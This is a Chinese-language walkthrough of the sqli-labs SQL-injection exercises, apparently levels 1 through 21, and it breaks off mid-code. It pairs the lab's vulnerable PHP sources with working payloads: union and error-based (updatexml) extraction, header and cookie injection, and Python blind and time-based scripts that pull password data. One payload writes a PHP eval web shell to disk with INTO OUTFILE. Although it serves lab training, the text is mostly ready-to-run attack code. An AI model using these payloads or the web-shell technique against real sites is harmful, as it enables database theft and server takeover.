


//logging the connection parameters to a file for analysis.

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$row = mysql_fetch_array($result);

    echo "<font size='5' color= '#99FF00'>";
    echo 'Your Login name:'. $row['username'];
    echo "<br>";
    echo 'Your Password:' .$row['password'];
    echo "</font>";
    echo '<font color= "#FFFF00">';
    echo "</font>";  

当知道是字符型注入可以直接构造去形成新的查询语句,输入'or 1=1--+,得到的语句就是SELECT * FROM users WHERE id=''or 1=1--+' LIMIT 0,1,直接截断了,并形成永真的语句,--+为mysql的注释,后面的语句全部被注释了,尝试payload




尝试联合查询' and 1=2 union select 1,database(),3 from information_schema.columns where table_schema=database()--+,获取数据库名字


获取列名' and 1=2 union select 1,group_concat(table_name),3 from information_schema.columns where table_schema=database()--+


获取表名' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database()--+




//logging the connection parameters to a file for analysis.

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$row = mysql_fetch_array($result);

    echo "<font size='5' color= '#99FF00'>";
    echo 'Your Login name:'. $row['username'];
    echo "<br>";
    echo 'Your Password:' .$row['password'];
    echo "</font>";
    echo '<font color= "#FFFF00">';
    echo "</font>";  

1 and 1=2 union select 1,database(),3 from information_schema.columns where table_schema=database()--+



//logging the connection parameters to a file for analysis.

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$row = mysql_fetch_array($result);

    echo "<font size='5' color= '#99FF00'>";
    echo 'Your Login name:'. $row['username'];
    echo "<br>";
    echo 'Your Password:' .$row['password'];
    echo "</font>";
    echo '<font color= "#FFFF00">';
    echo "</font>";  

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";,可以看到id用单引号和括号括起来了,只需要形成闭合就能直接payload,1'),可以直接闭合,然后把后面的注释了就可以直接payload

1') and 1=2 union select 1,database(),3 from information_schema.columns where table_schema=database()--+



//logging the connection parameters to a file for analysis.

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
$row = mysql_fetch_array($result);

    echo "<font size='5' color= '#99FF00'>";
    echo 'Your Login name:'. $row['username'];
    echo "<br>";
    echo 'Your Password:' .$row['password'];
    echo "</font>";
    echo '<font color= "#FFFF00">';
    echo "</font>";  


输入一个1进来后的sql语句,SELECT * FROM users WHERE id=("1") LIMIT 0,1,直接闭合输入1")--+,并且把后面注释掉,SELECT * FROM users WHERE id=("1")--+") LIMIT 0,1

1") and 1=2 union select 1,database(),3 from information_schema.columns where table_schema=database()--+



//logging the connection parameters to a file for analysis.

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$row = mysql_fetch_array($result);

    echo '<font size="5" color="#FFFF00">'; 
    echo 'You are in...........';
    echo "<br>";
        echo "</font>";

    echo '<font size="3" color="#FFFF00">';
    echo "</br></font>";    
    echo '<font color= "#0000ff" font size= 3>';    


审计代码发现如果查询到就输出You are in...........,错误就输出错误,所以这里直接用报错注入




爆库1'and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)--+


爆表1'and updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1)--+





//logging the connection parameters to a file for analysis.

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$row = mysql_fetch_array($result);

    echo '<font size="5" color="#FFFF00">'; 
    echo 'You are in...........';
    echo "<br>";
    echo "</font>";

    echo '<font size="3"  color= "#FFFF00">';
    echo "</br></font>";    
    echo '<font color= "#0000ff" font size= 3>';    



1" and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)--+



//logging the connection parameters to a file for analysis.

$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$row = mysql_fetch_array($result);

    echo '<font color= "#FFFF00">'; 
    echo 'You are in.... Use outfile......';
    echo "<br>";
    echo "</font>";
    echo '<font color= "#FFFF00">';
    echo 'You have an error in your SQL syntax';
    echo "</font>";  

这里提示用文件写入,You are in.... Use outfile......,可以直接写shell文件上去




1')) union select 1,2,"<?php @eval($_POST['laotun'])?>" into outfile "C:\\inetpub\\target\\sqlilabs\\Less-7\\shell.php"--+,直接使用蚁剑连接即可



//logging the connection parameters to a file for analysis.

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$row = mysql_fetch_array($result);

    echo '<font size="5" color="#FFFF00">'; 
    echo 'You are in...........';
    echo "<br>";
        echo "</font>";

    echo '<font size="5" color="#FFFF00">';
    //echo 'You are in...........';
    //echo "You have an error in your SQL syntax";
    echo "</br></font>";    
    echo '<font color= "#0000ff" font size= 3>';    





import reimport requestsimport string url = ""flag = ''  def payload(i, j):    # 数据库名字    sql = "1' and iascii(substr(database(),%d,1))>%d--+"%(i,j)    # 表名    #sql = "1' and ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d--+"%(i,j)    # 列名    #sql = "1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d--+"%(i,j)    # 查询flag    #sql = "1' and ascii(substr((select password from users),%d,1))>%d--+"%(i,j)     r = requests.get(url % sql)    # print (r.url)     if "You are in..........." in r.text:        res = 1    else:        res = 0    return res  def exp():    global flag    for i in range(1, 10000):        low = 31        high = 127        while low <= high:            mid = (low + high) // 2            res = payload(i, mid)            if res:                low = mid + 1            else:                high = mid - 1        f = int((low + high + 1)) // 2        if (f == 127 or f == 31):            break        # print (f)        flag += chr(f)        print(flag)  exp()




import reimport requestsimport stringimport time url = ""flag = ''  def payload(i, j):    startTime=time.time()    # 数据库名字    sql = "1' and if(ascii(substr(database(),%d,1))>%d,sleep(5),-1)%%23"%(i,j)    # 表名    #sql = "1' and if(ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)    # 列名    #sql = "1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)    # 查询flag    #sql = "1' and if(ascii(substr((select password from users),%d,1))>%d,sleep(5),-1)%%23"%(i,j)     r = requests.get(url + sql)    # print (r.url)    if time.time()-startTime>2:        res = 1    else:        res = 0    return res  def exp():    global flag    for i in range(1, 10000):        low = 31        high = 127        while low <= high:            mid = (low + high) // 2            res = payload(i, mid)            if res:                low = mid + 1            else:                high = mid - 1        f = int((low + high + 1)) // 2        if (f == 127 or f == 31):            break        # print (f)        flag += chr(f)        print(flag)  exp()


if(isset($_GET['id'])){$id=$_GET['id'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'ID:'.$id."\n");fclose($fp);$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);   if($row)    {   echo '<font size="5" color="#FFFF00">';     echo 'You are in...........';   echo "<br>";        echo "</font>";     }   else    {       echo '<font size="5" color="#FFFF00">'; echo 'You are in...........';   //print_r(mysql_error());   //echo "You have an error in your SQL syntax";  echo "</br></font>";        echo '<font color= "#0000ff" font size= 3>';            }}



import reimport requestsimport stringimport time url = ""flag = ''  def payload(i, j):    startTime=time.time()    # 数据库名字    sql = "1' and if(ascii(substr(database(),%d,1))>%d,sleep(5),-1)%%23"%(i,j)    # 表名    #sql = "1' and if(ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)    # 列名    #sql = "1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)    # 查询flag    #sql = "1' and if(ascii(substr((select password from users),%d,1))>%d,sleep(5),-1)%%23"%(i,j)     r = requests.get(url + sql)    # print (r.url)    if time.time()-startTime>2:        res = 1    else:        res = 0    return res  def exp():    global flag    for i in range(1, 10000):        low = 31        high = 127        while low <= high:            mid = (low + high) // 2            res = payload(i, mid)            if res:                low = mid + 1            else:                high = mid - 1        f = int((low + high + 1)) // 2        if (f == 127 or f == 31):            break        # print (f)        flag += chr(f)        print(flag)  exp()



if(isset($_GET['id'])){$id=$_GET['id'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'ID:'.$id."\n");fclose($fp);$id = '"'.$id.'"';$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);   if($row)    {   echo '<font size="5" color="#FFFF00">';     echo 'You are in...........';   echo "<br>";        echo "</font>";     }   else    {       echo '<font size="5" color="#FFFF00">'; echo 'You are in...........';   //print_r(mysql_error());   //echo "You have an error in your SQL syntax";  echo "</br></font>";        echo '<font color= "#0000ff" font size= 3>';            }}


sql = "1' and if(ascii(substr(database(),%d,1))>%d,sleep(5),-1)%%23"%(i,j)改成

sql = "1\" and if(ascii(substr(database(),%d,1))>%d,sleep(5),-1)%%23"%(i,j)即可


if(isset($_POST['uname']) && isset($_POST['passwd'])){  $uname=$_POST['uname']; $passwd=$_POST['passwd'];   //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a');    fwrite($fp,'User Name:'.$uname);    fwrite($fp,'Password:'.$passwd."\n");   fclose($fp);    @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";  $result=mysql_query($sql);  $row = mysql_fetch_array($result);  if($row)    {       //echo '<font color= "#0000ff">';                   echo "<br>";        echo '<font color= "#FFFF00" font size = 4>';       //echo " You Have successfully logged in\n\n " ;        echo '<font size="3" color="#0000ff">';         echo "<br>";        echo 'Your Login name:'. $row['username'];      echo "<br>";        echo 'Your Password:' .$row['password'];        echo "<br>";        echo "</font>";     echo "<br>";        echo "<br>";        echo '<img src="../images/flag.jpg"  />';                   echo "</font>";     }   else    {       echo '<font color= "#0000ff" font size="3">';       //echo "Try again looser";      print_r(mysql_error());     echo "</br>";       echo "</br>";       echo "</br>";       echo '<img src="../images/slap.jpg" />';            echo "</font>";     }


1' order by 3%23可以测出只有两列


直接爆库1' union select 1,database()%23,后面的操作跟前面一样



if(isset($_POST['uname']) && isset($_POST['passwd'])){  $uname=$_POST['uname']; $passwd=$_POST['passwd'];   //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a');    fwrite($fp,'User Name:'.$uname."\n");   fwrite($fp,'Password:'.$passwd."\n");   fclose($fp);    $uname='"'.$uname.'"';  $passwd='"'.$passwd.'"';    @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";  $result=mysql_query($sql);  $row = mysql_fetch_array($result);  if($row)    {       //echo '<font color= "#0000ff">';                   echo "<br>";        echo '<font color= "#FFFF00" font size = 4>';       //echo " You Have successfully logged in " ;        echo '<font size="3" color="#0000ff">';         echo "<br>";        echo 'Your Login name:'. $row['username'];      echo "<br>";        echo 'Your Password:' .$row['password'];        echo "<br>";        echo "</font>";     echo "<br>";        echo "<br>";        echo '<img src="../images/flag.jpg"   />';                  echo "</font>";     }   else    {       echo '<font color= "#0000ff" font size="3">';       //echo "Try again looser";      print_r(mysql_error());     echo "</br>";       echo "</br>";       echo "</br>";       echo '<img src="../images/slap.jpg"   />';          echo "</font>";     }}


1") union select 1,database()%23



if(isset($_POST['uname']) && isset($_POST['passwd'])){  $uname=$_POST['uname']; $passwd=$_POST['passwd'];   //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a');    fwrite($fp,'User Name:'.$uname."\n");   fwrite($fp,'Password:'.$passwd."\n");   fclose($fp);    @$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";  $result=mysql_query($sql);  $row = mysql_fetch_array($result);  if($row)    {       //echo '<font color= "#0000ff">';                   echo "<br>";        echo '<font color= "#FFFF00" font size = 4>';       //echo " You Have successfully logged in " ;        echo '<font size="3" color="#0000ff">';         echo "<br>";        //echo 'Your Login name:'. $row['username'];        //echo "<br>";      //echo 'Your Password:' .$row['password'];      //echo "<br>";      echo "</font>";     echo "<br>";        echo "<br>";        echo '<img src="../images/flag.jpg"   />';                  echo "</font>";     }   else    {       echo '<font color= "#0000ff" font size="3">';       //echo "Try again looser";      print_r(mysql_error());     echo "</br>";       echo "</br>";       echo "</br>";       echo '<img src="../images/slap.jpg"   />';          echo "</font>";     }}


1') or updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)%23



if(isset($_POST['uname']) && isset($_POST['passwd'])){  $uname=$_POST['uname']; $passwd=$_POST['passwd'];   //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a');    fwrite($fp,'User Name:'.$uname."\n");   fwrite($fp,'Password:'.$passwd."\n");   fclose($fp);    $uname='"'.$uname.'"';  $passwd='"'.$passwd.'"';    @$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";  $result=mysql_query($sql);  $row = mysql_fetch_array($result);  if($row)    {       //echo '<font color= "#0000ff">';                   echo "<br>";        echo '<font color= "#FFFF00" font size = 4>';       //echo " You Have successfully logged in " ;        echo '<font size="3" color="#0000ff">';         echo "<br>";        //echo 'Your Login name:'. $row['username'];        //echo "<br>";      //echo 'Your Password:' .$row['password'];      //echo "<br>";      echo "</font>";     echo "<br>";        echo "<br>";        echo '<img src="../images/flag.jpg" />';                    echo "</font>";     }   else    {       echo '<font color= "#0000ff" font size="3">';       //echo "Try again looser";      print_r(mysql_error());     echo "</br>";       echo "</br>";       echo "</br>";       echo '<img src="../images/slap.jpg"  />';           echo "</font>";     }}


1" or updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)%23



if(isset($_POST['uname']) && isset($_POST['passwd'])){  $uname=$_POST['uname']; $passwd=$_POST['passwd'];   //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a');    fwrite($fp,'User Name:'.$uname);    fwrite($fp,'Password:'.$passwd."\n");   fclose($fp);    // connectivity     @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";  $result=mysql_query($sql);  $row = mysql_fetch_array($result);  if($row)    {       //echo '<font color= "#0000ff">';                   echo "<br>";        echo '<font color= "#FFFF00" font size = 4>';       //echo " You Have successfully logged in\n\n " ;        echo '<font size="3" color="#0000ff">';         echo "<br>";        //echo 'Your Login name:'. $row['username'];        echo "<br>";        //echo 'Your Password:' .$row['password'];      echo "<br>";        echo "</font>";     echo "<br>";        echo "<br>";        echo '<img src="../images/flag.jpg"  />';                   echo "</font>";     }   else    {       echo '<font color= "#0000ff" font size="3">';       //echo "Try again looser";      //print_r(mysql_error());       echo "</br>";       echo "</br>";       echo "</br>";       echo '<img src="../images/slap.jpg"   />';          echo "</font>";     }}



import requests url = ""flag = ''  def payload(i, j):    # 数据库名字    sql = "1' or ascii(substr(database(),%d,1))>%d-- "%(i,j)    # 表名    #sql = "1')) and ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d--+"%(i,j)    # 列名    #sql = "1')) and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d--+"%(i,j)    # 查询flag    #sql = "1')) and ascii(substr((select password from users),%d,1))>%d--+"%(i,j)    data = {        'uname': sql,        'passwd': '1'    }        #r = requests.post(url, data)    r = requests.request('POST', url, data=data)    # print (r.url)    if "flag.jpg" in r.text:        res = 1    else:        res = 0    return res  def exp():    global flag    for i in range(1, 10000):        low = 31        high = 127        while low <= high:            mid = (low + high) // 2            res = payload(i, mid)            if res:                low = mid + 1            else:                high = mid - 1        f = int((low + high + 1)) // 2        if (f == 127 or f == 31):            break        # print (f)        flag += chr(f)        print(flag)  exp()


if(isset($_POST['uname']) && isset($_POST['passwd'])){  $uname=$_POST['uname']; $passwd=$_POST['passwd'];   //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a');    fwrite($fp,'User Name:'.$uname."\n");   fwrite($fp,'Password:'.$passwd."\n");   fclose($fp);    // connectivity $uname='"'.$uname.'"';  $passwd='"'.$passwd.'"';    @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";  $result=mysql_query($sql);  $row = mysql_fetch_array($result);  if($row)    {       //echo '<font color= "#0000ff">';                   echo "<br>";        echo '<font color= "#FFFF00" font size = 4>';       //echo " You Have successfully logged in " ;        echo '<font size="3" color="#0000ff">';         echo "<br>";        //echo 'Your Login name:'. $row['username'];        echo "<br>";        //echo 'Your Password:' .$row['password'];      echo "<br>";        echo "</font>";     echo "<br>";        echo "<br>";        echo '<img src="../images/flag.jpg"  />';                   echo "</font>";     }   else    {       echo '<font color= "#0000ff" font size="3">';       echo "</br>";       echo "</br>";       //echo "Try again looser";      //print_r(mysql_error());       echo "</br>";       echo "</br>";       echo "</br>";       echo '<img src="../images/slap.jpg"  />';           echo "</font>";     }}



import requests url = ""flag = ''  def payload(i, j):    # 数据库名字    sql = "1\") or ascii(substr(database(),%d,1))>%d-- "%(i,j)    # 表名    #sql = "1')) and ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d--+"%(i,j)    # 列名    #sql = "1')) and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d--+"%(i,j)    # 查询flag    #sql = "1')) and ascii(substr((select password from users),%d,1))>%d--+"%(i,j)    data = {        'uname': sql,        'passwd': '1'    }        #r = requests.post(url, data)    r = requests.request('POST', url, data=data)    # print (r.url)    if "flag.jpg" in r.text:        res = 1    else:        res = 0    return res  def exp():    global flag    for i in range(1, 10000):        low = 31        high = 127        while low <= high:            mid = (low + high) // 2            res = payload(i, mid)            if res:                low = mid + 1            else:                high = mid - 1        f = int((low + high + 1)) // 2        if (f == 127 or f == 31):            break        # print (f)        flag += chr(f)        print(flag)  exp()


function check_input($value)    {   if(!empty($value))      {       // truncation (see comments)        $value = substr($value,0,15);       }       // Stripslashes if magic quotes enabled     if (get_magic_quotes_gpc())         {           $value = stripslashes($value);          }       // Quote if not a number        if (!ctype_digit($value))           {           $value = "'" . mysql_real_escape_string($value) . "'";          }           else        {       $value = intval($value);        }   return $value;  }// take the variablesif(isset($_POST['uname']) && isset($_POST['passwd'])){//making sure uname is not injectable$uname=check_input($_POST['uname']);  $passwd=$_POST['passwd'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'User Name:'.$uname."\n");fwrite($fp,'New Password:'.$passwd."\n");fclose($fp);// connectivity @$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);//echo $row; if($row)    {       //echo '<font color= "#0000ff">';           $row1 = $row['username'];           //echo 'Your Login name:'. $row1;       $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";     mysql_query($update);       echo "<br>";            if (mysql_error())      {           echo '<font color= "#FFFF00" font size = 3 >';          print_r(mysql_error());         echo "</br></br>";          echo "</font>";     }       else        {           echo '<font color= "#FFFF00" font size = 3 >';          //echo " You password has been successfully updated " ;                 echo "<br>";            echo "</font>";     }           echo '<img src="../images/flag1.jpg"   />';         //echo 'Your Password:' .$row['password'];          echo "</font>";     }   else    {       echo '<font size="4.5" color="#FFFF00">';       //echo "Bug off you Silly Dumb hacker";     echo "</br>";       echo '<img src="../images/slap1.jpg"   />';         echo "</font>";     }}


payload,1' and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)%23



if(isset($_POST['uname']) && isset($_POST['passwd'])){  $uname = check_input($_POST['uname']);  $passwd = check_input($_POST['passwd']);        /*  echo 'Your Your User name:'. $uname;    echo "<br>";    echo 'Your Password:'. $passwd; echo "<br>";    echo 'Your User Agent String:'. $uagent;    echo "<br>";    echo 'Your User Agent String:'. $IP;    */  //logging the connection parameters to a file for analysis.     $fp=fopen('result.txt','a');    fwrite($fp,'User Agent:'.$uname."\n");      fclose($fp);        $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";   $result1 = mysql_query($sql);   $row1 = mysql_fetch_array($result1);    if($row1){      echo '<font color= "#FFFF00" font size = 3 >';      $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";      mysql_query($insert);       //echo 'Your IP ADDRESS is: ' .$IP;     echo "</font>";     //echo "<br>";      echo '<font color= "#0000ff" font size = 3 >';                  echo 'Your User Agent is: ' .$uagent;       echo "</font>";     echo "<br>";        print_r(mysql_error());                 echo "<br><br>";        echo '<img src="../images/flag.jpg"  />';       echo "<br>";            }   else{       echo '<font color= "#0000ff" font size="3">';       //echo "Try again looser";      print_r(mysql_error());     echo "</br>";                   echo "</br>";       echo '<img src="../images/slap.jpg"   />';          echo "</font>";     }}


payload'or updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1),'1','1')#



if(isset($_POST['uname']) && isset($_POST['passwd'])){  $uname = check_input($_POST['uname']);  $passwd = check_input($_POST['passwd']);        /*  echo 'Your Your User name:'. $uname;    echo "<br>";    echo 'Your Password:'. $passwd; echo "<br>";    echo 'Your User Agent String:'. $uagent;    echo "<br>";    echo 'Your User Agent String:'. $IP;    */  //logging the connection parameters to a file for analysis.     $fp=fopen('result.txt','a');    fwrite($fp,'Referer:'.$uname."\n");     fclose($fp);        $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";   $result1 = mysql_query($sql);   $row1 = mysql_fetch_array($result1);        if($row1)       {           echo '<font color= "#FFFF00" font size = 3 >';          $insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";            mysql_query($insert);           //echo 'Your IP ADDRESS is: ' .$IP;         echo "</font>";         //echo "<br>";          echo '<font color= "#0000ff" font size = 3 >';                      echo 'Your Referer is: ' .$uagent;          echo "</font>";         echo "<br>";            print_r(mysql_error());                     echo "<br><br>";            echo '<img src="../images/flag.jpg" />';            echo "<br>";                    }       else        {           echo '<font color= "#0000ff" font size="3">';           //echo "Try again looser";          print_r(mysql_error());         echo "</br>";                       echo "</br>";           echo '<img src="../images/slap.jpg"  />';               echo "</font>";         }}


payload'or updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1),'1')#



if(!isset($_COOKIE['uname']))   {   //including the Mysql connect parameters.   include("../sql-connections/sql-connect.php");  echo "<div style=' margin-top:20px;color:#FFF; font-size:24px; text-align:center'> Welcome   <font color='#FF0000'> Dhakkan </font><br></div>"; echo "<div  align='center' style='margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;'>";    echo "<div style='padding-top:10px; font-size:15px;'>";     echo "<!--Form to post the contents -->";   echo '<form action=" " name="form1" method="post">';    echo ' <div style="margin-top:15px; height:30px;">Username :    ';  echo '   <input type="text"  name="uname" value=""/>  </div>';      echo ' <div> Password :      '; echo '   <input type="text" name="passwd" value=""/></div></br>';       echo '   <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>';    echo '</form>'; echo '</div>';  echo '</div>';  echo '<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">';    echo '<font size="3" color="#FFFF00">'; echo '<center><br><br><br>';    echo '<img src="../images/Less-20.jpg" />'; echo '</center>';       function check_input($value)    {       if(!empty($value))      {           $value = substr($value,0,20); // truncation (see comments)      }           if (get_magic_quotes_gpc())  // Stripslashes if magic quotes enabled            {               $value = stripslashes($value);          }           if (!ctype_digit($value))       // Quote if not a number            {               $value = "'" . mysql_real_escape_string($value) . "'";          }       else        {           $value = intval($value);        }       return $value;  }       echo "<br>";    echo "<br>";        if(isset($_POST['uname']) && isset($_POST['passwd']))       {           $uname = check_input($_POST['uname']);      $passwd = check_input($_POST['passwd']);                $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";       $result1 = mysql_query($sql);       $row1 = mysql_fetch_array($result1);        $cookee = $row1['username'];            if($row1)               {               echo '<font color= "#FFFF00" font size = 3 >';              setcookie('uname', $cookee, time()+3600);                   header ('Location: index.php');             echo "I LOVE YOU COOKIES";              echo "</font>";             echo '<font color= "#0000ff" font size = 3 >';                          //echo 'Your Cookie is: ' .$cookee;             echo "</font>";             echo "<br>";                print_r(mysql_error());                         echo "<br><br>";                echo '<img src="../images/flag.jpg" />';                echo "<br>";                }           else                {               echo '<font color= "#0000ff" font size="3">';               //echo "Try again looser";              print_r(mysql_error());             echo "</br>";                           echo "</br>";               echo '<img src="../images/slap.jpg" />';                    echo "</font>";                 }           }                   echo "</font>";     echo '</font>'; echo '</div>';}else{    if(!isset($_POST['submit']))    {                       $cookee = $_COOKIE['uname'];            $format = 'D d M Y - H:i:s';            $timestamp = time() + 3600;         echo "<center>";            echo '<br><br><br>';            echo '<img src="../images/Less-20.jpg" />';         echo "<br><br><b>";         echo '<br><font color= "red" font size="4">';               echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];           echo "</font><br>";             echo '<font color= "cyan" font size="4">';              echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];                       echo "</font><br>";                     echo '<font color= "#FFFF00" font size = 4 >';          echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";            echo '<font color= "orange" font size = 5 >';                       echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);                                 echo "<br></font>";         $sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";          $result=mysql_query($sql);          if (!$result)           {               die('Issue with your mysql: ' . mysql_error());             }           $row = mysql_fetch_array($result);          if($row)            {               echo '<font color= "pink" font size="5">';                  echo 'Your Login name:'. $row['username'];              echo "<br>";                echo '<font color= "grey" font size="5">';                      echo 'Your Password:' .$row['password'];                echo "</font></b>";             echo "<br>";                echo 'Your ID:' .$row['id'];            }           else                {               echo "<center>";                echo '<br><br><br>';                echo '<img src="../images/slap1.jpg" />';               echo "<br><br><b>";             //echo '<img src="../images/Less-20.jpg" />';           }           echo '<center>';            echo '<form action="" method="post">';          echo '<input  type="submit" name="submit" value="Delete Your Cookie!" />';          echo '</form>';         echo '</center>';   }       else    {       echo '<center>';        echo "<br>";        echo "<br>";        echo "<br>";        echo "<br>";        echo "<br>";        echo "<br>";        echo '<font color= "#FFFF00" font size = 6 >';      echo " Your Cookie is deleted";             setcookie('uname', $row1['username'], time()-3600);             header ('Location: index.php');     echo '</font></center></br>';           }           echo "<br>";    echo "<br>";    //header ('Location: main.php');    echo "<br>";    echo "<br>";            //echo '<img src="../images/slap.jpg" /></center>'; //logging the connection parameters to a file for analysis.     $fp=fopen('result.txt','a');    fwrite($fp,'Cookie:'.$cookee."\n"); fclose($fp);    }


测试有几列,admin' order by 4%23,共3列


使用联合注入admin'and 1=2 union select 1,2,database()%23



if(!isset($_COOKIE['uname']))   {   //including the Mysql connect parameters.   include("../sql-connections/sql-connect.php");  echo "<div style=' margin-top:20px;color:#FFF; font-size:24px; text-align:center'> Welcome   <font color='#FF0000'> Dhakkan </font><br></div>"; echo "<div  align='center' style='margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;'>";    echo "<div style='padding-top:10px; font-size:15px;'>";     echo "<!--Form to post the contents -->";   echo '<form action=" " name="form1" method="post">';    echo ' <div style="margin-top:15px; height:30px;">Username :    ';  echo '   <input type="text"  name="uname" value=""/>  </div>';      echo ' <div> Password :      '; echo '   <input type="text" name="passwd" value=""/></div></br>';       echo '   <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>';    echo '</form>'; echo '</div>';  echo '</div>';  echo '<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">';    echo '<font size="3" color="#FFFF00">'; echo '<center><br><br><br>';    echo '<img src="../images/Less-21.jpg" />'; echo '</center>';   function check_input($value)    {   if(!empty($value))      {       $value = substr($value,0,20); // truncation (see comments)      }       if (get_magic_quotes_gpc())  // Stripslashes if magic quotes enabled            {           $value = stripslashes($value);          }       if (!ctype_digit($value))       // Quote if not a number            {           $value = "'" . mysql_real_escape_string($value) . "'";          }   else        {       $value = intval($value);        }   return $value;  }   echo "<br>";    echo "<br>";        if(isset($_POST['uname']) && isset($_POST['passwd']))       {           $uname = check_input($_POST['uname']);      $passwd = check_input($_POST['passwd']);                        $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";       $result1 = mysql_query($sql);       $row1 = mysql_fetch_array($result1);            if($row1)               {               echo '<font color= "#FFFF00" font size = 3 >';              setcookie('uname', base64_encode($row1['username']), time()+3600);                                  echo "I LOVE YOU COOKIES";              echo "</font>";             echo '<font color= "#0000ff" font size = 3 >';                          //echo 'Your Cookie is: ' .$cookee;             echo "</font>";             echo "<br>";                print_r(mysql_error());                         echo "<br><br>";                echo '<img src="../images/flag.jpg" />';                echo "<br>";                header ('Location: index.php');             }           else                {               echo '<font color= "#0000ff" font size="3">';               //echo "Try again looser";              print_r(mysql_error());             echo "</br>";                           echo "</br>";               echo '<img src="../images/slap.jpg" />';                    echo "</font>";                 }           }                   echo "</font>";     echo '</font>'; echo '</div>';}else{    if(!isset($_POST['submit']))        {           $cookee = $_COOKIE['uname'];            $format = 'D d M Y - H:i:s';            $timestamp = time() + 3600;         echo "<center>";            echo "<br><br><br><b>";         echo '<img src="../images/Less-21.jpg" />';         echo "<br><br><b>";         echo '<br><font color= "red" font size="4">';               echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];           echo "</font><br>";             echo '<font color= "cyan" font size="4">';              echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];                       echo "</font><br>";                     echo '<font color= "#FFFF00" font size = 4 >';          echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";            echo '<font color= "orange" font size = 5 >';                       echo "YOUR COOKIE : uname = 